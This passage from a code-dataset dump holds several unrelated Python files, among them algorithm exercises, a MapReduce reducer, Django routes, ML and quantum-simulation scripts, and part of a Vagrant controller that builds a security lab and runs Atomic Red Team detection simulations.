self.dwg_results\n","repo_name":"philip-peiffer/hunting-stats","sub_path":"Drawing_Simulation/DrawSimul.py","file_name":"DrawSimul.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74546117812","text":"from Binarysearchtree import Node\nfrom Binarysearchtree import BinarySearchTree\n\nclass BinarySearchTree_withsumpathprint(BinarySearchTree):\n def sumpath_print(self, s):\n if not self._root:\n return []\n ls = []\n re = []\n self.__sumpath_print(self._root, s, ls, re)\n return re\n\n def __sumpath_print(self, node, s, ls, re):\n\n if not node._left and not node._right and node._item == s:\n ls.append(node._item)\n re.append(ls)\n\n if node._left:\n self.__sumpath_print(node._left, s-node._item, ls+[node._item], re)\n\n if node._right:\n self.__sumpath_print(node._right, s-node._item, ls+[node._item], re)\n\nif __name__ == '__main__':\n numbers = [6, 4, 8, 7, 9, 2, 1, 3, 5, 13, 11 ,10, 12]\n bst = BinarySearchTree_withsumpathprint()\n for nu in numbers:\n bst.add(nu)\n\n bst.print_inorder()\n print()\n print(bst.sumpath_print(15))\n\n","repo_name":"yuzhecd/al_py","sub_path":"Tree/pathsum_print.py","file_name":"pathsum_print.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10077396668","text":"# encoding=utf8\n\n'''\n面试题 17.21. Volume of Histogram LCCI\nImagine a histogram (bar graph). Design an algorithm to compute the volume of water it could hold if someone poured water across the top. You can assume that each histogram bar has width 1.\n\n\n\nThe above elevation map is represented by array [0,1,0,2,1,0,1,3,2,1,2,1]. In this case, 6 units of water (blue section) are being trapped. Thanks Marcos for contributing this image!\n\nExample:\n\nInput: [0,1,0,2,1,0,1,3,2,1,2,1]\nOutput: 6\n\n\n面试题 17.21. 直方图的水量\n给定一个直方图(也称柱状图),假设有人从上面源源不断地倒水,最后直方图能存多少水量?直方图的宽度为 1。\n\n\n\n上面是由数组 [0,1,0,2,1,0,1,3,2,1,2,1] 表示的直方图,在这种情况下,可以接 6 个单位的水(蓝色部分表示水)。 感谢 Marcos 贡献此图。\n\n示例:\n\n输入: [0,1,0,2,1,0,1,3,2,1,2,1]\n输出: 6\n'''\n\n\nclass Solution(object):\n def trap(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n # 动态规划\n if not height:\n return 0\n length = len(height)\n\n max_left = [height[0]]\n max_right = [0 for _ in range(length-1)] + [height[-1]]\n\n for i in range(1, length):\n j = length - i - 1\n max_left.append(max(max_left[i-1], height[i-1]))\n max_right[j] = max(height[j+1], max_right[j+1])\n\n res = 0\n for i in range(length):\n res += max(0, min(max_right[i]-height[i], max_left[i] - height[i]))\n\n return res\n\n\nclass Solution1(object):\n def trap(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n # 双指针\n length = len(height)\n i, j = 0, length - 1\n\n left_max = height[0]\n right_max = height[-1]\n\n res = 0\n while i < j:\n left_max = max(height[i], left_max)\n right_max = max(height[j], right_max)\n if height[i] < height[j]:\n res += left_max - height[i]\n i += 1\n else:\n res += right_max - height[j]\n j -= 1\n return res\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/dynamic-programming/leetcode-17.21-VolumeofHistogramLCCI.py","file_name":"leetcode-17.21-VolumeofHistogramLCCI.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4675941317","text":"import sys\n\ncount_dept_dict = {}\nadjacency_square_matrix = [[0 for i in range(40)] for j in range(40)]\n\ndef multiplyRowColumn(row_list, column_list):\n sum = 0\n\n for i in range(40):\n sum += row_list[i]*column_list[i]\n\n return sum\n\n\nfor line in sys.stdin:\n # Read row and column indices and values\n row_data, column_data = line.split('\\t')\n row, row_values = row_data.split(\" \")\n column, column_values = column_data.split(\" \")\n\n row = int(row)\n column = int(column)\n\n # Prepare row values\n row_values = row_values.strip('[').strip(']').split(',')\n row_values = [int(x) for x in row_values]\n\n # Prepare column values\n column_values = column_values.strip('[').strip('\\n').strip(']').split(',')\n column_values = [int(x) for x in column_values]\n\n # Calculation of matrix square\n adjacency_square_matrix[row][column] = multiplyRowColumn(row_values, column_values)\n \n# Printing result for common nodes\nfor row in range(40):\n for column in range(row + 1, 40): \n if adjacency_square_matrix[row][column] != 0:\n print (row, column, adjacency_square_matrix[row][column])\n\n\nprint(\"Any node pair not present in this file has no common nodes \")","repo_name":"shrysh8bit/Computing-Lab-2","sub_path":"No SQL 2/Query3/reducer2.py","file_name":"reducer2.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"555227243","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"seach\", views.searchBox, name=\"search\"),\n path(\"add\", views.add, name=\"add\"),\n path(\"random\", views.randomEntry, name=\"random\"),\n path(\"edit\", views.edit, name=\"edit\"),\n path(\"saveEdit\", views.saveEdit, name=\"save\"),\n path(\"wiki/\", views.lookup, name=\"entry\")\n]\n","repo_name":"lucascorumba/cs50-web","sub_path":"wiki/encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6897975557","text":"import unittest\nfrom HW3.graph import find_shortest_path, find_negative_cycles\n\n\nclass TestGraph(unittest.TestCase):\n\n def test_1(self):\n result = find_shortest_path(\"path1.txt\", 2., 3.)\n answer = ([2.0, 5.0, 6.0, 3.0], 5.0)\n assert result == answer\n\n def test_2(self):\n result = find_shortest_path(\"path2.txt\", 2., 4.)\n answer = ([], float(\"inf\"))\n assert result == answer\n\n def test_3(self):\n result = find_negative_cycles(\"path3.txt\")\n answer = [[1., 2., 3., 4., 1.], [2., 3., 4., 1., 2.],\n [3., 4., 1., 2., 3.], [4., 1., 2., 3., 4.]]\n assert result in answer\n\n def test_4(self):\n result = find_negative_cycles(\"path4.txt\")\n answer = []\n assert result == answer\n","repo_name":"krisshen4/BigDataTech","sub_path":"HW3/test_graph/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8006088770","text":"\"\"\"\nGiven an array of strings strs, group the anagrams together. You can return the answer in any order.\n\nAn Anagram is a word or phrase formed by rearranging the letters of a different word or phrase,\ntypically using all the original letters exactly once.\n\nSol:\n\"\"\"\n\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n # keyVal = {}\n # for i in strs:\n # keyVal[i] = ''.join(sorted(i))\n # print(keyVal)\n # result = {}\n # for key, val in keyVal.items():\n # result.setdefault(val, []).append(key)\n #\n # return list(result.values())\n\n keyVal = {}\n for i in strs:\n x = ''.join(sorted(i))\n if x in keyVal:\n keyVal[x].append(i)\n else:\n keyVal[x] = [i]\n\n return list(keyVal.values())\n\nobj = Solution()\nprint(obj.groupAnagrams([\"\",\"\"]))\nprint(obj.groupAnagrams([\"abc\",\"abc\"]))","repo_name":"senumulapally/DataStructures","sub_path":"Blind75/Arrays/GroupAnagrams_49.py","file_name":"GroupAnagrams_49.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34691674160","text":"import os, sys\nfrom logging.config import fileConfig\n\nfrom alembic import context\nfrom sqlalchemy import engine_from_config\nfrom sqlalchemy import pool\n\nsys.path = sys.path + [os.path.abspath(\"../server\")]\nfrom models import metadata\n\n\nconfig = context.config\nfileConfig(config.config_file_name) # Setup loggers\n\n\ndef run_migrations_offline():\n context.configure(\n url=os.environ[\"GD_PGSQL_DSN\"],\n target_metadata=metadata,\n literal_binds=True,\n )\n with context.begin_transaction():\n context.run_migrations()\n\n\ndef run_migrations_online():\n connectable = engine_from_config(\n config.get_section(config.config_ini_section),\n url=os.environ[\"GD_PGSQL_DSN\"],\n prefix=\"sqlalchemy.\",\n poolclass=pool.NullPool,\n )\n with connectable.connect() as connection:\n context.configure(connection=connection, target_metadata=metadata)\n with context.begin_transaction():\n context.run_migrations()\n\n\nif context.is_offline_mode():\n run_migrations_offline()\nelse:\n run_migrations_online()\n","repo_name":"scieloorg/graph-data-experiment","sub_path":"migrations/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20653069972","text":"# -*- coding: utf-8 -*-\nfrom numpy import *\nfrom scipy import linalg as LA\nfrom matplotlib.pyplot import *\nimport matplotlib.cm as cm\n\n# 多変量分布の図示\nmu = array([0, 0]) # 平均\nS = array([[1, 0.5],[0.5, 2]]) # 分散\nSinv = LA.inv(S)\ndetS = LA.det(S)\n\ndef N(x, y):\n v = array([x,y])\n return exp(-(v-mu).T.dot(Sinv).dot(v-mu)/2)/(2*pi*sqrt(detS))\n\nX, Y = meshgrid(linspace(-3, 3, 100), linspace(-3, 3, 100))\nZ = vectorize(N)(X, Y)\n\nxlim(-3, 3)\nylim(-3, 3)\n\npcolor(X, Y, Z, alpha=0.3)\nshow()\n","repo_name":"nineties/prml-seminar","sub_path":"prog/prog2-3.py","file_name":"prog2-3.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"1866048014","text":"#!/usr/bin/env python\n\n'''\n\nMake Quantum Trajectory\nAuthor: Gil Tabak\nDate: Nov 3, 2016\n\nGenerating trajectories using quantum state diffusion. We will be primairly\ninterested in the absorptive bistability (Jaynes Cummings model)\nI store trajectory files as *.pkl files or *.mat files. This way I can easily\nload them into another notebook, or load the trajectories to matlab.\nRequires Python 3.\n\n'''\n\nfrom quantum_state_diffusion import (\n qsd_solve,\n qsd_solve_two_systems\n)\n\nfrom utils import (\n save2mat,\n save2pkl,\n print_params\n)\n\nfrom prepare_regime import (\n make_system_JC,\n make_system_kerr_bistable,\n make_system_kerr_bistable_regime2,\n make_system_kerr_bistable_regime3,\n make_system_kerr_bistable_regime4,\n make_system_kerr_bistable_regime5,\n make_system_kerr_bistable_regime6,\n make_system_kerr_bistable_regime7,\n make_system_kerr_bistable_regime_chose_drive,\n make_system_kerr_qubit,\n ## make_system_JC_two_systems, ## Not yet implemented\n make_system_kerr_bistable_two_systems,\n make_system_kerr_qubit_two_systems,\n make_system_empty_then_kerr,\n make_system_kerr_bistable_regime_chose_drive_two_systems,\n)\n\nimport sdeint\nimport argparse\nimport numpy as np\nimport numpy.linalg as la\nimport logging\nimport os\nimport pickle\nfrom scipy import sparse\nfrom sympy import sqrt\nimport sys\n\nSDEINT_METHODS = {\"itoEuler\": sdeint.itoEuler,\n \"itoSRI2\": sdeint.itoSRI2,\n ## \"itoMilstein\": itoMilstein.itoSRI2,\n \"numItoMilstein\": sdeint.numItoMilstein,\n \"itoImplicitEuler\": sdeint.itoImplicitEuler,\n \"itoQuasiImplicitEuler\": sdeint.itoQuasiImplicitEuler}\nIMPLICIT_METHODS=[\"itoImplicitEuler\"]\n\n# Log everything to stdout\nlogging.basicConfig(stream=sys.stdout,level=logging.DEBUG)\n\ndef get_parser():\n '''get_parser returns the arg parse object, for use by an external application (and this script)\n '''\n parser = argparse.ArgumentParser(\n description=\"generating trajectories using quantum state diffusion\")\n\n\n ################################################################################\n # General Simulation Parameters\n ################################################################################\n\n # Seed\n parser.add_argument(\"--seed\",\n dest='seed',\n help=\"Seed to set for the simulation.\",\n type=int,\n default=1)\n\n # Number of trajectories\n parser.add_argument(\"--ntraj\",\n dest='ntraj',\n help=\"number of trajectories, should be kept at 1 if run via slurm\",\n type=int,\n default=1)\n\n # Duration\n parser.add_argument(\"--duration\",\n dest='duration',\n help=\"Duration (iterations = duration / divided by delta_t)\",\n type=float,\n default=10)\n\n # Delta T\n parser.add_argument(\"--delta_t\",\n dest='deltat',\n help=\"Parameter delta_t\",\n type=float,\n default=2e-3)\n\n # How much to downsample results\n parser.add_argument(\"--downsample\",\n dest='downsample',\n help=\"How much to downsample results\",\n type=int,\n default=1)\n\n # Simulation method\n parser.add_argument(\"--sdeint_method_name\",\n dest='sdeint_method_name',\n help=\"Which simulation method to use from sdeint packge.\",\n type=str,\n default=\"\")\n\n ################################################################################\n # System-specific parameters\n ################################################################################\n\n # regime\n parser.add_argument(\"--regime\",\n dest='regime',\n help=\"Type of system or regime.\"\n \"Can be 'absorptive_bistable', 'kerr_bistable', or 'kerr_qubit'\",\n type=str,\n default='absorptive_bistable')\n\n # num_systems\n parser.add_argument(\"--num_systems\",\n dest='num_systems',\n help=\"Number of system in the network. Can currently be 1 or 2\",\n type=int,\n default=1)\n\n # Nfock_a\n parser.add_argument(\"--Nfock_a\",\n dest='nfocka',\n help=\"Number of fock states in each cavity\",\n type=int,\n default=50)\n\n # Nfock_j\n parser.add_argument(\"--Nfock_j\",\n dest='nfockj',\n help=\"Dimensionality of atom states\"\n \"Used only if using a Jaynes-Cummings model\",\n type=int,\n default=2)\n\n ################################################################################\n # Parameters that apply only for the two-system case\n ################################################################################\n\n # R\n parser.add_argument(\"--R\",\n dest='R',\n help=\"Reflectivity of the beamsplitter in the two-system case.\",\n type=float,\n default=0.)\n\n # eps\n parser.add_argument(\"--eps\",\n dest='eps',\n help=\"Amplification of the classical signal when using partially classical transmission.\",\n type=float,\n default=0.)\n\n # noise_amp\n parser.add_argument(\"--noise_amp\",\n dest='noise_amp',\n help=\"Artificial amplification of the measurement-feedback noise.\"\n \"This is a non-physical term that is useful for understanding the effects of noise.\",\n type=float,\n default=1.)\n\n # trans_phase\n parser.add_argument(\"--trans_phase\",\n dest='trans_phase',\n help=\"Additional phase term added between the two systems.\",\n type=float,\n default=1.)\n\n # drive_second_system\n parser.add_argument(\"--drive_second_system\",\n dest='drive_second_system',\n help=\"Whether the second system is independently driven.\",\n type=bool,\n default=False)\n\n ################################################################################\n # Output Variables\n ################################################################################\n\n\n # Does the user want to quiet output?\n parser.add_argument(\"--quiet\",\n dest='quiet',\n action=\"store_true\",\n help=\"Turn off logging (debug and info)\",\n default=False)\n\n # Specify output directory\n parser.add_argument(\"--output_dir\",\n dest='outdir',\n type=str,\n help=\"Output folder. If not defined, will use place in a directory /trajectory_data.\",\n default=None)\n\n # Save to pickle?\n parser.add_argument(\"--save2pkl\",\n dest='save2pkl',\n action=\"store_true\",\n help=\"Save pickle file to --output_dir\",\n default=False)\n\n # Save to mat?\n parser.add_argument(\"--save2mat\",\n dest='save2mat',\n action=\"store_true\",\n help=\"Save .mat file to --output_dir\",\n default=False)\n return parser\n\n\ndef main():\n parser = get_parser()\n try:\n args = parser.parse_args()\n except:\n sys.exit(0)\n\n # Set up commands from parser\n params = dict()\n ntraj = params['Ntraj'] = args.ntraj\n seed = params['seed'] = args.seed\n duration = params['duration'] = args.duration\n delta_t = params['delta_t'] = args.deltat\n Nfock_a = params['Nfock_a'] = args.nfocka\n Nfock_j = params['Nfock_j'] = args.nfockj\n downsample = params['downsample'] = args.downsample\n Regime = params['regime'] = args.regime\n num_systems = params['num_systems'] = args.num_systems\n drive_second_system = params['drive_second_system'] = args.drive_second_system\n\n if args.sdeint_method_name == \"\":\n logging.info(\"sdeint_method_name not set. Using itoEuler as a default.\")\n sdeint_method_name = params['sdeint_method_name'] = \"itoEuler\"\n else:\n sdeint_method_name = params['sdeint_method_name'] = args.sdeint_method_name\n\n R = params['R'] = args.R\n eps = params['eps'] = args.eps\n noise_amp = params['noise_amp'] = args.noise_amp\n trans_phase = params['trans_phase'] = args.trans_phase\n\n # Does the user want to print verbose output?\n quiet = args.quiet\n\n if not quiet:\n print_params(params=params)\n\n # How much to downsample results\n logging.info(\"Downsample set to %s\", downsample)\n\n ## Names of files and output\n if args.outdir is None:\n outdir = os.getcwd()\n else:\n outdir = args.outdir\n\n try:\n os.stat(outdir)\n except:\n os.mkdir(outdir)\n\n param_str = (\"%s-\"*14)[:-1] %(seed,\n ntraj,\n delta_t,\n Nfock_a,\n Nfock_j,\n duration,\n downsample,\n sdeint_method_name,\n num_systems,\n R,\n eps,\n noise_amp,\n trans_phase,\n drive_second_system)\n file_name = '%s/QSD_%s_%s' %(outdir,Regime,param_str)\n\n # Saving options\n save_mat = args.save2mat\n save_pkl = args.save2pkl\n\n if save_mat == False and save_pkl == False:\n logging.warning(\"Both pickle and mat save are disabled, no data will be saved.\")\n logging.warning(\"You can modify this with args --save2pkl and --save2mat\")\n\n implicit_type = None\n\n if sdeint_method_name in SDEINT_METHODS:\n sdeint_method = SDEINT_METHODS[sdeint_method_name]\n\n ## For now let's use the full implicit method for implicit methods.\n ## The value implicit_type can be made one of:\n ## \"implicit\", \"semi_implicit_drift\", or \"semi_implicit_diffusion\".\n if sdeint_method_name in IMPLICIT_METHODS:\n implicit_type = \"implicit\"\n else:\n logging.error(\"Unknown sdeint_method_name, %s, or not implemented yet.\", sdeint_method_name)\n raise ValueError(\"Unknown sdeint_method_name, or not implemented yet.\")\n\n tspan = np.arange(0,duration,delta_t)\n\n obsq_data = None\n if num_systems == 1:\n\n if Regime == \"absorptive_bistable\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_JC(Nfock_a, Nfock_j)\n elif Regime == \"kerr_bistable\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable(Nfock_a)\n elif Regime == \"kerr_bistable2\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime2(Nfock_a)\n elif Regime == \"kerr_bistable3\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime3(Nfock_a)\n elif Regime == \"kerr_bistable4\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime4(Nfock_a)\n elif Regime == \"kerr_bistable5\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime5(Nfock_a)\n elif Regime == \"kerr_bistable6\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime6(Nfock_a)\n elif Regime == \"kerr_bistable7\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime7(Nfock_a)\n elif Regime[:len(\"kerr_bistable\")] == \"kerr_bistable\": ##inputs in this case are e.g. kerr_bistableA33.25_...\n which_kerr = Regime[len(\"kerr_bistable\")] ## e.g. A in kerr_bistableA33.25_\n custom_drive = float(Regime[len(\"kerr_bistableA\"):]) ## e.g. 33.25 in kerr_bistableA33.25\n logging.info(\"Regime is set to %s, with custom drive %s\" %(Regime, custom_drive))\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_bistable_regime_chose_drive(Nfock_a, which_kerr, custom_drive)\n elif Regime == \"kerr_qubit\":\n logging.info(\"Regime is set to %s\", Regime)\n H, psi0, Ls, obsq_data, obs_names = make_system_kerr_qubit(Nfock_a)\n else:\n logging.error(\"Unknown regime, %s, or not implemented yet.\", Regime)\n raise ValueError(\"Unknown regime, or not implemented yet.\")\n\n ### Run simulation for one system\n D = qsd_solve(H=H,\n psi0=psi0,\n tspan=tspan,\n Ls=Ls,\n sdeint_method=sdeint_method,\n obsq = obsq_data,\n ntraj = ntraj,\n seed = seed,\n normalize_state=True,\n downsample=downsample,\n implicit_type=implicit_type,\n )\n elif num_systems == 2:\n\n if Regime == \"absorptive_bistable\":\n logging.info(\"Regime is set to %s\", Regime)\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_JC_two_systems(Nfock_a, Nfock_j, drive_second_system)\n elif Regime == \"kerr_bistable\":\n logging.info(\"Regime is set to %s\", Regime)\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_kerr_bistable_two_systems(Nfock_a, drive_second_system)\n elif Regime == \"kerr_qubit\":\n logging.info(\"Regime is set to %s\", Regime)\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_kerr_qubit_two_systems(Nfock_a, drive_second_system)\n elif Regime[:len(\"empty_then_kerr\")] == 'empty_then_kerr': ##e.g. empty_then_kerrA33.25\n which_kerr = Regime[len(\"empty_then_kerr\")] ## e.g. A in empty_then_kerrA33.25_\n custom_drive = float(Regime[len(\"empty_then_kerrA\"):]) ## e.g. 33.25 in empty_then_kerrA33.25\n logging.info(\"Regime is set to %s, with custom drive %s\" %(Regime, custom_drive))\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_empty_then_kerr(Nfock_a, which_kerr, custom_drive)\n elif Regime[:len(\"kerr_bistable\")] == \"kerr_bistable\": ##inputs in this case are e.g. kerr_bistableA33.25_...\n which_kerr = Regime[len(\"kerr_bistable\")] ## e.g. A in kerr_bistableA33.25_\n custom_drive = float(Regime[len(\"kerr_bistableA\"):]) ## e.g. 33.25 in kerr_bistableA33.25\n logging.info(\"Regime is set to %s, with custom drive %s\" %(Regime, custom_drive))\n H1, H2, psi0, L1s, L2s, obsq_data, obs_names = make_system_kerr_bistable_regime_chose_drive_two_systems(Nfock_a, which_kerr, custom_drive)\n\n else:\n logging.error(\"Unknown regime, %s, or not implemented yet.\", Regime)\n raise ValueError(\"Unknown regime, or not implemented yet.\")\n\n ### Run simulation for one system\n D = qsd_solve_two_systems(H1,\n H2,\n psi0,\n tspan,\n L1s,\n L2s,\n R=R,\n eps=eps,\n n=noise_amp,\n sdeint_method=sdeint_method,\n trans_phase=trans_phase,\n obsq=obsq_data,\n normalize_state=True,\n downsample=downsample,\n ops_on_whole_space = False, ## assume the given operators only operate on their own subspace\n multiprocessing = False, ## disable multiprocessing for now\n ntraj=ntraj,\n seed=seed,\n implicit_type = implicit_type,\n )\n else:\n logging.error(\"Unknown num_systems, %s, or not implemented yet.\", num_systems)\n raise ValueError(\"Unknown num_systems, or not implemented yet.\")\n\n ### include time in results\n D.update({'tspan':tspan})\n\n ### downsample\n D_downsampled = {'psis' : D['psis'],\n 'obsq_expects' : D['obsq_expects'],\n 'seeds' : D['seeds'],\n 'tspan' : D['tspan'][::downsample] }\n\n ### Save results\n if save_mat:\n logging.info(\"Saving mat file...\")\n save2mat(data=D_downsampled,\n file_name=file_name,\n obs=obs_names,\n params=params)\n if save_pkl:\n logging.info(\"Saving pickle file...\")\n save2pkl(data=D_downsampled,\n file_name=file_name,\n obs=obs_names,\n params=params)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tabakg/quantum_state_diffusion","sub_path":"make_quantum_trajectory.py","file_name":"make_quantum_trajectory.py","file_ext":"py","file_size_in_byte":18025,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17231406024","text":"import json\n\n# define the format of the info\ndata = '{\"mac\": \"XX:YY:ZZ:XX:YY:ZZ\", \"cellnumber\": \"XX\", \"signal_total\": \"XX\", \"signal_quality\": \"XX\", \"encryption\": \"XXXX\", \"signal_level_dBm\": \"XXX\", \"essid\": \"XXX\"}'\n\n# passed the data to string\nparsed_json = (json.loads(data))\n\n# printing to check\n# print(json.dumps(parsed_json, indent=4, sort_keys=True))\n\n# distance between cellphone and notebook\ndistance = [\"1m\", \"5m\", \"10m\", \"20m\", \"30m\"]\n\n\n# array to receive the reads\nsignal_level = []\n\n# iterating in all directories\nfor dist in distance:\n # read the directory with the json files\n for x in range (1, 100):\n\n # oppening the files and save the information in a string\n with open(\"./reads2/\" + dist + \"/read_\" + str(x) + \".json\", 'r') as f:\n info = json.load(f)\n\n # iterating the to get the signal's strength\n for resp in info:\n if (resp[\"essid\"] == \"PhoneArtifact11\"):\n # print (resp['signal_level_dBm'])\n signal_level.append(resp['signal_level_dBm'])\n\n # priting information\n # print (signal_level)\n\n # save information in a file to access later\n file = \"./results2/\" + dist + \".txt\"\n\n with open(file, 'w') as f:\n for item in signal_level:\n f.write(\"%s\\n\" % item)\n \n # cleaning the array to be empty in the next iterarion of distance\n signal_level = []","repo_name":"leviresende/iwlist","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72645265972","text":"from cs285.algorithms.algorithm import Algorithm\nimport tensorflow as tf\n\n\nclass BehaviorCloning(Algorithm):\n\n def __init__(\n self,\n policy,\n policy_optimizer_class=tf.keras.optimizers.Adam,\n policy_optimizer_kwargs=None,\n **kwargs,\n ):\n # train a policy using behavior cloning on expert samplers\n Algorithm.__init__(self, **kwargs)\n self.policy = policy\n\n # build an optimizer for the policy\n if policy_optimizer_kwargs is None:\n policy_optimizer_kwargs = dict(lr=0.0001, clipnorm=1.0)\n self.policy_optimizer = policy_optimizer_class(\n **policy_optimizer_kwargs)\n\n def update_algorithm(\n self,\n observations,\n actions,\n rewards,\n next_observations,\n terminals\n ):\n # update the policy with behavior cloning\n with tf.GradientTape() as tape:\n\n # compute the log probability of expert actions\n log_prob = self.policy.log_prob(actions, observations)\n self.record(\"log_prob\", tf.reduce_mean(log_prob))\n\n # build the cross entropy loss\n policy_loss = -tf.reduce_mean(log_prob)\n self.record(\"policy_loss\", policy_loss)\n\n # back prop gradients to maximize log prob of expert actions\n policy_gradients = tape.gradient(\n policy_loss, self.policy.trainable_variables)\n self.policy_optimizer.apply_gradients(zip(\n policy_gradients, self.policy.trainable_variables))\n","repo_name":"brandontrabucco/cs285","sub_path":"cs285/algorithms/imitate/behavior_cloning.py","file_name":"behavior_cloning.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1784767060","text":"\nfrom jinja2 import Environment, FileSystemLoader\nimport vagrant\nfrom tabulate import tabulate\nimport re\nimport ansible_runner\nimport sys\nimport os\nimport yaml\nfrom modules import splunk_sdk\n\n\nclass VagrantController():\n\n\n def __init__(self, config, log):\n self.config = config\n self.log = log\n\n if self.config['install_es'] == '1':\n self.config['splunk_es_app_version'] = re.findall(r'\\d+', self.config['splunk_es_app'])[0]\n\n self.vagrantfile = 'Vagrant.configure(\"2\") do |config| \\n \\n'\n\n if config['phantom_server'] == '1':\n self.vagrantfile += self.read_vagrant_file('phantom-server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['splunk_server'] == '1':\n self.vagrantfile += self.read_vagrant_file('splunk_server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['splunk_server'] == '0':\n self.vagrantfile += self.read_vagrant_file('caldera-server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['windows_domain_controller'] == '1':\n self.vagrantfile += self.read_vagrant_file('windows-domain-controller/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['windows_client'] == '1':\n self.vagrantfile += self.read_vagrant_file('windows10/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['windows_server'] == '1':\n self.vagrantfile += self.read_vagrant_file('windows-server/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n if config['kali_machine'] == '1':\n self.vagrantfile += self.read_vagrant_file('kali-machine/Vagrantfile')\n self.vagrantfile += '\\n\\n'\n self.vagrantfile += '\\nend'\n with open('vagrant/Vagrantfile', 'w') as file:\n file.write(self.vagrantfile)\n\n\n def read_vagrant_file(self, path):\n j2_env = Environment(loader=FileSystemLoader('vagrant'),trim_blocks=True)\n template = j2_env.get_template(path)\n vagrant_file = template.render(self.config)\n return vagrant_file\n\n\n def build(self):\n self.log.info(\"[action] > build\\n\")\n v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False, quiet_stderr=False)\n try:\n v1.up(provision=True, provider=\"virtualbox\")\n except:\n self.log.error(\"vagrant failed to build\")\n sys.exit(1)\n\n self.log.info(\"attack_range has been built using vagrant successfully\")\n self.list_machines()\n\n\n def destroy(self):\n self.log.info(\"[action] > destroy\\n\")\n v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n v1.destroy()\n self.log.info(\"attack_range has been destroy using vagrant successfully\")\n\n\n def stop(self):\n print(\"[action] > stop\\n\")\n v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n v1.halt()\n\n\n def resume(self):\n print(\"[action] > resume\\n\")\n v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n v1.up()\n\n\n def simulate(self, target, simulation_techniques, simulation_atomics):\n\n # check if specific atomics are used then it's not allowed to multiple techniques\n techniques_arr = simulation_techniques.split(',')\n if (len(techniques_arr) > 1) and (simulation_atomics != 'no'):\n self.log.error('ERROR: if simulation_atomics are used, only a single simulation_technique is allowed.')\n sys.exit(1)\n\n run_specific_atomic_tests = 'True'\n if simulation_atomics == 'no':\n run_specific_atomic_tests = 'False'\n\n # get ip address from machine\n self.check_targets_running_vagrant(target, self.log)\n target_ip = self.get_ip_address_from_machine(target)\n runner = ansible_runner.run(private_data_dir='.',\n cmdline=str('-i ' + target_ip + ', '),\n roles_path=\"ansible/roles\",\n playbook='ansible/atomic_red_team.yml',\n extravars={'art_branch': self.config['art_branch'], 'art_repository': self.config['art_repository'], 'run_specific_atomic_tests': run_specific_atomic_tests, 'art_run_tests': simulation_atomics, 'art_run_techniques': simulation_techniques, 'ansible_user': 'Vagrant', 'ansible_password': 'vagrant', 'ansible_port': 